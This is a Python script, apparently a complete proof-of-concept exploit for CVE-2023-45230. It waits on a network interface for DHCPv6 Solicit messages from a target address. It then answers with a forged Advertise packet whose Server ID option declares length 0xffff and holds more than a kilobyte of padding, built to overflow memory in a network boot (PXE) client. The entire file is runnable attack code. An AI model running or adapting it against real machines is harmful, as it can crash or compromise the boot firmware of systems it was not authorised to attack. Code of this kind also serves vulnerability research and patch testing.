import struct
import argparse

from scapy.packet import Raw
from scapy.layers.inet import UDP
from scapy.layers.inet6 import IPv6
from scapy.layers.dhcp6 import DHCP6, DHCP6_Solicit, DHCP6_Advertise, DHCP6OptServerId, DHCP6OptClientId, DHCP6OptIA_NA, DHCP6OptStatusCode, DHCP6OptIAAddress, DHCP6OptDNSServers, DHCP6OptVendorClass, DHCP6OptBootFileUrl, DHCP6_Request, DHCP6_Reply, VENDOR_SPECIFIC_OPTION, DHCP6OptServerUnicast
from scapy.all import send, sniff

def send_advertise_long_server_id(args, solicit_pkt):
    ip = IPv6(src=args.src, dst=args.target)
    udp = UDP(sport=solicit_pkt['UDP'].dport, dport=solicit_pkt['UDP'].sport)
    advertise = DHCP6_Advertise(trid=solicit_pkt['DHCP6_Solicit'].trid)
    preference = Raw(b'\x00\x07\x00\x01\xff')

    bootfile_url = DHCP6OptBootFileUrl(optdata='tftp://[{}]/bug02poc'.format(args.src))
    boot_params =  Raw(b'\x00\x3c\x00\x06\x00\x041500')
    dns_servers = DHCP6OptDNSServers(dnsservers=[args.src])
    vendor_class = DHCP6OptVendorClass(enterprisenum=343, vcdata=b"\x00\x20PXEClient:Arch:00007:UNDI:003000")

    iana_short = DHCP6OptIA_NA(iaid=solicit_pkt['DHCP6OptIA_NA'].iaid, T1=solicit_pkt['DHCP6OptIA_NA'].T1, T2=solicit_pkt['DHCP6OptIA_NA'].T2, ianaopts=[DHCP6OptIAAddress(addr='fe80::a1:b2:c3:d4', preflft=0xffffffff, validlft=0xffffffff), DHCP6OptStatusCode(statuscode=0x00, statusmsg=b'AN IA_NA ADDRESS')])
    iana_proxy = DHCP6OptIA_NA(iaid=solicit_pkt['DHCP6OptIA_NA'].iaid, T1=solicit_pkt['DHCP6OptIA_NA'].T1, T2=solicit_pkt['DHCP6OptIA_NA'].T2, ianaopts=[DHCP6OptIAAddress(addr='fe80::a1:b2:c3:d5', preflft=0xffffffff, validlft=0xffffffff), DHCP6OptStatusCode(statuscode=0x00, statusmsg=b'THIS IS A PROXY')])

    server_id = DHCP6OptServerId(duid=b'SERVERID_FROM_ADVERTISE' + b'A' * 0x444, optlen=0xffff)
    client_id = DHCP6OptClientId(duid=solicit_pkt['DHCP6OptClientId'].duid)
    pkt = ip/udp/advertise/preference/bootfile_url/boot_params/dns_servers/vendor_class/client_id/iana_short/iana_proxy/server_id
    send(pkt, iface=args.interface)


def main(args):
    while True:
        print('Waiting for DHCPv6 packets...')
        rs = sniff(count=1, iface=args.interface, lfilter=lambda pkt: pkt.haslayer(DHCP6_Solicit) or pkt.haslayer(DHCP6_Request))[0]
        print('Received DHCPv6 message from {} to {}'.format(rs[IPv6].src, rs[IPv6].dst))
        rs.show()

        if rs[IPv6].src == args.target:
            if rs.haslayer(DHCP6_Solicit):
                print('Sending Advertise packet with a long Server ID ...')
                send_advertise_long_server_id(args, rs)
            else:
                print('Ignoring unsupported DHCP message')
        else:
            print('Ignoring request from address {}'.format(rs[IPv6].src))


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description="Proof of concept for CVE-2023-45230.")
    parser.add_argument('--src', type=str, required=False, help='Source IPv6 address to use')
    parser.add_argument('--target', type=str, required=True, help='Target IPv6 address')
    parser.add_argument('--interface', type=str, required=True, help='Name of the network interface to use')
    args = parser.parse_args()

    main(args)
